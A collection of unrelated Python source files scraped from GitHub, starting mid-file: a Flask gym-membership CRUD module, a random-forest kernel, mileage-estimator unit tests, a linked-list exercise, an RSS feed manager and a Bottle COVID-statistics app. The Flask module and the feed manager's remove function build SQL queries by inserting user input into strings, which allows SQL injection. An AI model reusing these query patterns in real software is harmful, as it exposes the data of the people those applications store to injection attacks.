dt\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy.exc import IntegrityError\r\nfrom sqlalchemy.sql import text\r\nfrom models import *\r\n\r\n\r\nmembers_blueprint=Blueprint('members',__name__)\r\n\r\n\r\n@members_blueprint.route('/')\r\n@members_blueprint.route('/')\r\ndef member(page_num=1):\r\n count = db.engine.execute(f\"SELECT count('M_ID') from 'MEMBERS'\").scalar()\r\n \r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5,page=page_num , error_out = False)\r\n \r\n return render_template('/adminstrap_theme/adminstrap_theme/members.html' , ismembers=\"active\" , title = \"Members\" , rows = MEMBERS.query.all() , Data_Paginate=Data_Paginate , isact=\"active\" , mcount=count , packages = PACKAGE.query.all() , trainers = TRAINERS.query.all())\r\n\r\n\r\n@members_blueprint.route('/add_member' , methods=['POST'])\r\ndef add_member():\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n if request.method == \"POST\":\r\n m_name = request.form.get(\"m_name\")\r\n m_gender = request.form.get(\"m_gender\")\r\n m_joindate = dt.utcnow().date()\r\n m_dob = request.form.get(\"m_dob\")\r\n m_weight = request.form.get(\"m_weight\")\r\n m_height = request.form.get(\"m_height\")\r\n m_email = request.form.get(\"m_email\")\r\n m_mob_no = request.form.get(\"m_mob_no\")\r\n m_location = request.form.get(\"m_location\")\r\n tr_id = request.form.get(\"tr_id\")\r\n pk_id = request.form.get(\"pk_id\")\r\n \r\n \r\n try:\r\n fk_check = db.session.execute(\"pragma foreign_keys=on\")\r\n \r\n if m_dob=='':\r\n flash(\"Please select date of birth\" , \"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n elif tr_id == '' or pk_id == '' or (pk_id=='' and tr_id==''):\r\n flash(\"Please Select the Trainer / Package\",\"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n trainer = db.session.execute(f\"INSERT INTO 'MEMBERS'('M_NAME' , 'M_GENDER' ,'M_DOB' ,'M_WEIGHT' ,'M_HEIGHT' , 'M_EMAIL' , 'M_MOB_NO' , 'M_JOINDATE' , 'M_LOCATION' , 'TR_ID' , 'PK_ID') VALUES( '{m_name}' ,'{m_gender}' ,'{m_dob}' ,'{m_weight}' , '{m_height}' , '{m_email}' , '{m_mob_no}' , '{m_joindate}' , '{m_location}' , '{tr_id}' , '{pk_id}') \")\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Member / email / mobile number already exists\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n flash(\"Member added successfully\" , \"success\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n\r\n\r\n@members_blueprint.route('/edit_member/' ,methods=[\"POST\"])\r\ndef edit_member(m_id):\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n\r\n if request.method == \"POST\":\r\n m_name = request.form.get(\"m_name\")\r\n m_gender = request.form.get(\"m_gender\")\r\n m_dob = request.form.get(\"m_dob\")\r\n m_weight = request.form.get(\"m_weight\")\r\n m_height = request.form.get(\"m_height\")\r\n m_email = request.form.get(\"m_email\")\r\n m_mob_no = request.form.get(\"m_mob_no\")\r\n m_location = request.form.get(\"m_location\")\r\n tr_id = request.form.get(\"tr_id\")\r\n pk_id = request.form.get(\"pk_id\")\r\n \r\n try:\r\n db.engine.execute(f\"Update 'MEMBERS' SET M_NAME='{m_name}' , M_GENDER= '{m_gender}' , M_DOB='{m_dob}' , M_WEIGHT='{m_weight}' , M_HEIGHT='{m_height}' , M_MOB_NO = '{m_mob_no}' , M_EMAIL = '{m_email}' , M_LOCATION = '{m_location}' , PK_ID = '{pk_id}' , TR_ID = '{tr_id}' where M_ID ='{m_id}' \")\r\n flash(\"Member updated successfully\" , \"success\")\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Some error occured\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n \r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n\r\n\r\n@members_blueprint.route('/delete_member/' )\r\ndef delete_member(m_id):\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n try:\r\n print(m_id)\r\n fk_check = db.session.execute(\"pragma foreign_keys=on\");\r\n db.session.execute(f\"DELETE FROM MEMBERS WHERE 'MEMBERS'.'M_ID' = {m_id}\")\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Some error occured\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n flash(\"Member deleted successfully\" , \"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))","repo_name":"tejas-mn/DBMS-PROJECT","sub_path":"members.py","file_name":"members.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30482947499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 19 12:21:24 2016\n\n@author: lzeng\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom random import randint\nfrom sklearn.ensemble import RandomForestRegressor\nfrom itertools import compress\nfrom func import get_leaves\nfrom func import get_lineage\n\ndef get_partial_kernel(forest, dataset):\n SAMPLE_SIZE = len(dataset)\n\n #Select random tree\n TreeIndex = randint(0,forest.n_estimators-1)\n Arbre = forest.estimators_[TreeIndex]\n #Define tree parameters\n n_nodes = Arbre.tree_.node_count\n children_left = Arbre.tree_.children_left\n children_right = Arbre.tree_.children_right\n\n # h =Arbre.tree_.max_depth #all trees don't have the same height???\n\n #Node selection\n leaf_index = Arbre.apply(dataset)\n leaf_nodes = np.array(list(set(leaf_index))) # Remove duplicates\n # print \"Leaf index size: {}\".format(len(leaf_nodes))\n\n is_leaves, node_depth = get_leaves(children_left, children_right, n_nodes)\n # print \"is_leaves: {}\".format(sum(is_leaves))\n myparents = get_lineage(Arbre, leaf_index, node_depth)\n\n myparents = np.array(myparents)\n\n h = max(node_depth[is_leaves]) - 1\n d = randint(0, h)\n\n # print(d)\n\n # print(np.mean(node_depth[is_leaves]))\n # print(np.var(node_depth[is_leaves]))\n # print \"Max-height: {}\".format(h)\n # print \"Choses-height: {}\".format(d)\n\n nth_parent_for_sample = []\n for lineage in myparents:\n ancest = None\n if len(lineage) <= d:\n ancest = lineage[-1]\n else:\n ancest = lineage[d]\n nth_parent_for_sample.append(ancest)\n\n partial_kernel = np.zeros([SAMPLE_SIZE, SAMPLE_SIZE])\n\n #Loop over each datapoint : two data point are assigned to the same cluster if they have the same ancestor\n for i in range(SAMPLE_SIZE):\n for j in range(i, SAMPLE_SIZE):\n if nth_parent_for_sample[i][0] == nth_parent_for_sample[j][0]:\n partial_kernel[i][j] = 1\n partial_kernel[j][i] = 1\n\n return partial_kernel\n\n\ndef get_kernel(train_data, test_data, label):\n\n #Define forest (n_estimators = number of trees)\n forest = RandomForestRegressor(n_estimators=1000, warm_start = True)\n forest = forest.fit(train_data, label)\n\n dataset = np.concatenate((train_data, test_data), axis=0)\n\n SAMPLE_SIZE = len(dataset)\n M = 100\n\n #Loop that generates samples of the PDF\n kernel_list = np.empty([M, SAMPLE_SIZE, SAMPLE_SIZE])\n for m in range(M):\n print(\"Building partial kernel: {}\".format(m))\n kernel_list[m,:,:] = get_partial_kernel(forest, dataset)\n\n #Average the samples to compute the kernel\n kernel = np.mean(kernel_list, axis=0)\n\n # B = np.zeros((SAMPLE_SIZE, SAMPLE_SIZE))\n # I = np.identity(SAMPLE_SIZE)\n # alpha = 0.1\n\n # for m in range(M):\n # B += np.linalg.inv(kernel_list[m,:,:] + alpha * I)\n\n # B *= M\n # return B\n\n return kernel\n \n\n","repo_name":"marthall/random_forest_kernel","sub_path":"test/RegressionKernel.py","file_name":"RegressionKernel.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13044263736","text":"\"\"\"Unit tests for the `estimator` module.\"\"\"\n\nimport math\nfrom datetime import date\n\nimport pytest\nfrom mileage.estimator import (\n Calculator,\n MeanMileage,\n MOTTest,\n ProjectedMileage,\n SaleAdvertisement,\n Vehicle,\n VRMChange,\n)\n\n\n@pytest.fixture(name=\"vehicle\")\ndef fixture_vehicle() -> Vehicle:\n \"\"\"Vehicle to be used in tests.\"\"\"\n return Vehicle(\n vrm=\"AB51 DVL\",\n make=\"Ford\",\n model=\"Escape Sedan\",\n registration_date=date(2001, 9, 1),\n )\n\n\ndef test_add_get_events_no_filter(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events can be added and retrieved from a vehicle.\"\"\"\n events = vehicle.get_events()\n assert len(events) == 0\n\n mot_test = MOTTest(date=date(2003, 8, 15), mileage=20_000, result=True)\n vehicle.add_event(mot_test)\n\n events = vehicle.get_events()\n assert len(events) == 1\n assert events[0] == mot_test\n\n\ndef test_add_get_events_filtered(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events can be added and retrieved from a vehicle.\n\n A filter is applied.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(MOTTest(date=date(2003, 8, 17), mileage=20_020, result=False))\n\n events = vehicle.get_events() # type: ignore\n assert len(events) == 2\n\n mot_result_filter = lambda event: event.result # type: ignore\n events = vehicle.get_events(mot_result_filter) # type: ignore\n assert len(events) == 0\n\n mot_mileage_filter = lambda event: event.mileage == 20_000 # type: ignore\n events = vehicle.get_events(mot_mileage_filter) # type: ignore\n assert len(events) == 1\n\n\ndef test_add_get_events_nonchronological(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events are maintained in chronologically ascending order.\"\"\"\n mot_test = MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False)\n advert = SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n vrm_change = VRMChange(\n date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\"\n )\n\n vehicle.add_event(advert)\n vehicle.add_event(vrm_change)\n vehicle.add_event(mot_test)\n\n events = vehicle.get_events()\n assert len(events) == 3\n assert isinstance(events[0], MOTTest) and events[0].date == mot_test.date\n assert isinstance(events[1], SaleAdvertisement) and events[1].date == advert.date\n assert isinstance(events[2], VRMChange) and events[2].date == vrm_change.date\n\n\ndef test_add_get_events_duplicate(vehicle: Vehicle) -> None:\n \"\"\"Verify that the vehicle timeline does not contain duplicate events.\"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n events = vehicle.get_events()\n assert len(events) == 3\n assert isinstance(events[0], MOTTest)\n assert isinstance(events[1], SaleAdvertisement)\n assert isinstance(events[2], VRMChange)\n\n\ndef test_average_annual_mileage_single_event(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n There is a single mileage-present event in the event timeline.\n \"\"\"\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_multi_events(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n There are multiple mileage-present events in the event timeline.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_last_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n The last timeline event is mileage-absent.\n \"\"\"\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage handles no mileage in timeline.\n\n This can be due to not having events in the timeline or all events in the timeline\n not having mileage information.\n \"\"\"\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert mean_annual_mileage == 7900\n\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DCD\")\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 11, 10), from_VRM=\"AB51 DCD\", to_VRM=\"AB51 DVL\")\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert mean_annual_mileage == 7900\n\n\ndef test_projected_mileage_isolated(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation in using a stubbed average calculator.\"\"\"\n\n class StubbedCalculator(Calculator):\n \"\"\"Stubbed calculator for unit testing.\"\"\"\n\n def calculate(self, vehicle: Vehicle) -> float:\n return 15_000\n\n projected_calculator = ProjectedMileage(StubbedCalculator(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 45_011, rel_tol=1e-04)\n\n\ndef test_projected_mileage_multi_events(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation using a `MeanMileage` calculator.\n\n The vehicle contains multiple timeline events.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n projected_calculator = ProjectedMileage(MeanMileage(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 36_032, rel_tol=1e-04)\n\n\ndef test_projected_mileage_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation using a `MeanMileage` calculator.\n\n The vehicle does not contain timeline events.\n \"\"\"\n projected_calculator = ProjectedMileage(MeanMileage(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 23_705, rel_tol=1e-04)\n\n\ndef test_event_invalid_date(vehicle: Vehicle) -> None:\n \"\"\"Verify that adding an event earlier than the registration date is not allowed.\"\"\"\n with pytest.raises(ValueError):\n vehicle.add_event(MOTTest(date=date(2001, 8, 31), mileage=20_000, result=False))\n","repo_name":"jashburn8020/vehicle-mileage","sub_path":"tests/estimator_test.py","file_name":"estimator_test.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"789629888","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution1:\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n prev = None\n \n while head:\n cur = head\n head = head.next\n cur.next = prev\n prev = cur\n \n return prev\n\nclass Solution2:\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n return self.reverse(head, None)\n \n def reverse(self, head, prev):\n if not head:\n return prev\n \n next_node = head.next\n head.next = prev\n return self.reverse(next_node, head)","repo_name":"PhoebeDreamer/leetcode","sub_path":"src/lc206.py","file_name":"lc206.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9058345568","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport json\nimport sqlite3\nimport datetime\nimport scraperwiki\nimport feedparser\nimport argparse\n\n\ndef write_response(r=None, success=True, message=None):\n d = {\n \"results\": r,\n \"success\": \"ok\" if success else \"error\",\n \"message\": message or \"\"\n }\n json.dump(d, sys.stdout)\n sys.stdout.flush()\n\n\nclass Feed(object):\n\n @classmethod\n def retrieve(cls, name, url):\n try:\n d = feedparser.parse(url)\n\n # Check it is actually a feed\n except Exception as e:\n return None, None\n\n name = name or d['feed'].get('title', 'subtitle')\n for e in d.entries:\n r = {\n \"feed\": name,\n \"source\": url,\n \"id\": e.id,\n \"title\": e.title,\n \"link\": e.link,\n \"published\": e.link,\n \"updated\": e.updated,\n \"summary\": e.summary,\n \"content\": e.content if hasattr(e, \"content\") else \"\",\n } \n scraperwiki.sqlite.save([\"id\",\"link\"], r, \"entries\")\n\n return name, None\n\nclass FeedManager(object):\n\n def status(self):\n \"\"\"\n Returns the current status of the feeds as a list of dicts where\n each dict contains:\n name, url, count of entries, last_fetch, last_error\n \"\"\"\n res = []\n rows = scraperwiki.sqlite.execute(\"select name,url from feeds\")\n for row in rows['data']:\n nm = row[0]\n url = row[1]\n cnt = scraperwiki.sqlite.execute(\"select count(*) from entries where feed=? and source=?\", [nm, url])\n cnt = int(cnt['data'][0][0])\n d = {\n \"name\": row[0],\n \"url\" : row[1],\n \"items\": cnt\n }\n res.append(d)\n\n write_response(res)\n\n\n def add(self, url):\n \"\"\"\n Adds a new feed when provided with a URL, if successful returns the\n status()\n \"\"\"\n name, err = Feed.retrieve(None, url)\n if err:\n write_response(success=False, message=err)\n return\n\n f = {\n \"name\": name,\n \"url\": url\n }\n scraperwiki.sqlite.save(['name', 'url'], f, \"feeds\")\n self.status()\n\n\n def remove(self, url):\n \"\"\"\n Removes an existing feed when provided with a URL, if successful returns the\n status()\n \"\"\" \n scraperwiki.sqlite.execute(\"delete from feeds where url='%s';\" % url)\n scraperwiki.sqlite.commit()\n self.status()\n\n def reset(self):\n \"\"\"\n Removes all data :(\n \"\"\"\n scraperwiki.sqlite.execute(\"delete from feeds\")\n scraperwiki.sqlite.execute(\"delete from entries\")\n self.status()\n\n def process(self):\n \"\"\"\n Iterates through all of the feeds and fetches the contents, before writing\n them to the database.\n \"\"\"\n feeds = scraperwiki.sqlite.execute(\"select name,url from feeds\")\n for nm,url in feeds['data']:\n Feed.retrieve(nm, url)\n\n self.status()\n\n\n# Make sure the database exists, setting up the entries and feeds table.\nscraperwiki.sql.dt.create_table({'id': '1'}, 'entries')\nscraperwiki.sql.dt.create_table({'name':'', 'url': ''}, 'feeds')\n\n# Read command line args to decide what we should be doing\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('--status', action='store_true')\nparser.add_argument('--reset', action='store_true')\nparser.add_argument('--add', action='store')\nparser.add_argument('--remove', action='store')\nparser.add_argument('--process', action='store_true')\n\nfeeder = FeedManager()\n\nargs = parser.parse_args()\nif args.status:\n feeder.status()\nelif args.add:\n feeder.add(args.add)\nelif args.remove:\n feeder.remove(args.remove)\nelif args.reset:\n feeder.reset()\nelif args.process:\n feeder.process()\n","repo_name":"rossjones/feed-tool","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29611761408","text":"from bottle import Bottle, run, template, static_file\nimport csv\nimport os\nimport sys\nimport time\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(name)s:%(levelname)s:%(message)s') # nous utilisons des formats différents pour le fichier et pour la console \nformatter_stream = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n\nfile_handler = logging.FileHandler('sample.log')\nfile_handler.setLevel(logging.ERROR)\nfile_handler.setFormatter(formatter)\n\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter_stream)\n\nlogger.addHandler(file_handler)\nlogger.addHandler(stream_handler)\n\n\n#fichier=os.environ['DATACOVID']\n# datafile for container\n# add comment to test ci worklflow\n#fichier = '/opt/app/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n\nfichier = '/opt/app/time_series_covid19_deaths_global.csv'\nfichier2 = '/opt/app/time_series_covid19_confirmed_global.csv'\nvaccineFile = '/opt/app/time_series_covid19_vaccine_global.csv'\n\n\n# datafile for local testing (home desktop)\n#fichier=\"/Users/matthias/python/data/COVID19/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n\n# datafile for local testing (home work desktop)\n#fichier=\"/Users/20011409/python/html-graph/COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n\n# get the data files\n#path = \".\"\nlogger.debug(\"Define files from John Hopkins University in Github\")\nwget_file1=\"wget -q https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\nwget_file2=\"wget -q https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\"\nwget_vaccine=\"wget -q https://raw.githubusercontent.com/govex/COVID-19/master/data_tables/vaccine_data/global_data/time_series_covid19_vaccine_global.csv\"\n\n#os.chdir(path) # Specifying the path where the cloned project needs to be copied\n\nprint(\"cloning Github data\" )\nlogger.debug(\"Start Cloning Github Data\")\nos.system(wget_file1) # Cloning\nos.system(wget_file2)\nos.system(wget_vaccine)\nlogger.debug(\"End Cloning Github Data\")\nprint(\"end cloning\")\n\n#Get update time\nlogger.debug(\"define consts\")\nnow = time.localtime(time.time())\nupdate_time = time.strftime(\"%y/%m/%d %H:%M\", now)\npopulation_us = 329256465\npopulation_fr = 67848156\npopulation_it = 60359546\npopulation_sp = 46934632\npopulation_uk = 65761117\ndebut = 50\nlabels=list()\n\ndef derivee(raw_data):\n\tvalue=0\n\tprog=[]\n\tfor i, v in enumerate(raw_data[:-1]):\n\t\ttry:\n\t\t\tvalue=int(raw_data[i+1])-int(raw_data[i])\n\t\texcept ValueError:\n\t\t\tprint(\"[ERROR] in derivee function : could not convert data into an integer.\")\n\t\tif value > 0:\n\t\t\tprog.append(value)\n\t\telse:\n\t\t\tprog.append(0)\n\treturn prog\n\ndef moyenne(raw_data, population):\n#cette fonction permet de ramener les chiffres à la population (pour 1 000 000 habitants)\n\tmoy=[]\n\tmoy=[i*1000000/population for i in raw_data]\n\t# suppression des valeurs abérantes\n\t#for c,i in enumerate(moy):\n\t\t#if i > 0.20:\n\t\t\t#moy[c]=0\n\treturn moy\n\ndef lissage(raw_data):\n#cette fonction permet de lisser une courbe en utilisant la moyenne de x dernières données\n\tlissee=[]\n\tvalue=0\n\tfor i, v in enumerate(raw_data[7:]):\n\t\ttry:\n\t\t\tif i > 2:\n\t\t\t\tvalue=((raw_data[i-1]+raw_data[i-2]+raw_data[i-3]+raw_data[i-4]+raw_data[i-5]+raw_data[i-6]+raw_data[i-7])/7)\n\t\t\telse:\n\t\t\t\tvalue=raw_data[i]\n\t\texcept ValueError:\n\t\t\tprint(\"[ERROR] in derivee function : could not convert data into an integer.\")\n\t\tif value > 0:\n\t\t\tlissee.append(value)\n\t\telse:\n\t\t\tlissee.append(0)\n\treturn lissee\n\n#print (\"3 - lecture fichiers\")\n#death file \nwith open(fichier, 'r') as f:\n\ttab_reader = csv.reader(f, delimiter=',')\n\tfor row in tab_reader:\n\t\tprovince = row[0]\n\t\tstate = row[1]\n\t\tif province == 'Province/State':\n\t\t\tlongueur=len(row)\n\t\t\tlabels=row[debut:longueur]\n\t\t\tprint(\"Nombre de valeurs pour les morts:\"+ str(longueur))\n\t\t\t#days=row[4:longueur]\n\t\tif province == '':\n\t\t\tif state == 'France':\n\t\t\t\t#print(row)\n\t\t\t\tlongueur=len(row)\n\t\t\t\tfrance=row[debut:longueur]\n\t\t\tif state == 'Italy':\n\t\t\t\tlongueur=len(row)\n\t\t\t\titaly=row[debut:longueur]\n\t\t\tif state == 'Spain':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tspain=row[debut:longueur]\n\t\t\tif state == 'United Kingdom':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tuk=row[debut:longueur]\n\t\t\tif state == 'US':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tus=row[debut:longueur]\n\n#confirmed file\nwith open(fichier2, 'r') as f:\n\ttab_reader = csv.reader(f, delimiter=',')\n\tfor row in tab_reader:\n\t\tprovince = row[0]\n\t\tstate = row[1]\n\t\tif province == 'Province/State':\n\t\t\tlongueur=len(row)\n\t\t\tlabels=row[debut:longueur]\n\t\t\t#print(\"Nombre de valeurs pour les cas confirmes:\"+ str(longueur))\n\t\t\t#days=row[4:longueur]\n\t\tif province == '':\n\t\t\tif state == 'France':\n\t\t\t\t#print(row)\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_france=row[debut:longueur]\n\t\t\tif state == 'Italy':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_italy=row[debut:longueur]\n\t\t\tif state == 'Spain':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_spain=row[debut:longueur]\n\t\t\tif state == 'United Kingdom':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_uk=row[debut:longueur]\n\t\t\tif state == 'US':\n\t\t\t\tlongueur=len(row)\n\t\t\t\tconfirmed_us=row[debut:longueur]\n\n\n#vaccine file\n\n#calculs\n# la progression est la dérivée des données brutes ...\n#print (\"calculs\")\nprogression_france = derivee(france)\nprogression_italy=derivee(italy)\nprogression_spain=derivee(spain)\nprogression_uk=derivee(uk)\nprogression_us=derivee(us)\n\nconfirmed_progression_france = derivee(confirmed_france)\nconfirmed_progression_italy=derivee(confirmed_italy)\nconfirmed_progression_spain=derivee(confirmed_spain)\nconfirmed_progression_uk=derivee(confirmed_uk)\nconfirmed_progression_us=derivee(confirmed_us)\n\n#calcul de la moyenne pour 1 000 000 habitants\nmean_fr=moyenne(progression_france, population_fr)\nmean_it=moyenne(progression_italy, population_it)\nmean_sp=moyenne(progression_spain,population_sp)\nmean_uk=moyenne(progression_uk,population_uk)\nmean_us=moyenne(progression_us, population_us)\n\nconfirmed_mean_fr=moyenne(confirmed_progression_france, population_fr)\nconfirmed_mean_it=moyenne(confirmed_progression_italy, population_it)\nconfirmed_mean_sp=moyenne(confirmed_progression_spain,population_sp)\nconfirmed_mean_uk=moyenne(confirmed_progression_uk,population_uk)\nconfirmed_mean_us=moyenne(confirmed_progression_us, population_us)\n\n#\n\n#app et app.route ici\n\n#\n#print(\"avant run(app ..)\")\napp = Bottle()\n\n@app.route('/static/')\n\ndef server_static(filepath):\n return static_file(filepath, root='static/')\n\n@app.route('/')\n\ndef index():\n\t#assert len(labels)=len(progression_france), \"Error : number of dates is different from number of values!\"\n return template('index.tpl',\n\t\t\t\t\tupdate_time=update_time,\n\t\t\t\t\tlabel=labels,\n\t\t\t\t\tmonth_label=labels[-60:],\n\t\t\t\t\tprogression_fr=lissage(progression_france),\n\t\t\t\t\tconfirmed_data_fr=lissage(confirmed_progression_france),\n\t\t\t\t\tprogression_us=lissage(progression_us),\n\t\t\t\t\tconfirmed_data_us=lissage(confirmed_progression_us),\n\t\t\t\t\tprogression_uk=lissage(progression_uk),\n\t\t\t\t\tconfirmed_data_uk=lissage(confirmed_progression_uk),\n\t\t\t\t\tdata_fr=lissage(mean_fr),\n\t\t\t\t\tdata_us=lissage(mean_us),\n\t\t\t\t\tdata_uk=lissage(mean_uk),\n\t\t\t\t\tdata_it=lissage(mean_it),\n\t\t\t\t\tdata_sp=lissage(mean_sp),\n\t\t\t\t\tdata_month_fr=lissage(mean_fr[-60:]),\n\t\t\t\t\tdata_month_us=lissage(mean_us[-60:]),\n\t\t\t\t\tdata_month_uk=lissage(mean_uk[-60:]),\n\t\t\t\t\tdata_month_it=lissage(mean_it[-60:]),\n\t\t\t\t\tdata_month_sp=lissage(mean_sp[-60:]),\n\t\t\t\t\tlast_update=labels[-1],\n\t\t\t\t\tlast_value_fr=progression_france[-1],\n\t\t\t\t last_value_us=progression_us[-1],\n\t\t\t\t\tlast_value_uk=progression_uk[-1],\n\t\t\t\t\tlast_value_sp=progression_spain[-1],\n\t\t\t\t\tlast_value_it=progression_italy[-1],\n\t\t\t\t\tlast_value_confirmed_fr=confirmed_progression_france[-1],\n\t\t\t\t\tlast_value_confirmed_us=confirmed_progression_us[-1],\n\t\t\t\t\tlast_value_confirmed_uk=confirmed_progression_uk[-1],\n\t\t\t\t\tlast_value_confirmed_sp=confirmed_progression_spain[-1],\n\t\t\t\t\tlast_value_confirmed_it=confirmed_progression_italy[-1],\n\t\t\t\t\t)\n\nrun(app, host='0.0.0.0', debug=True, reloader=False, 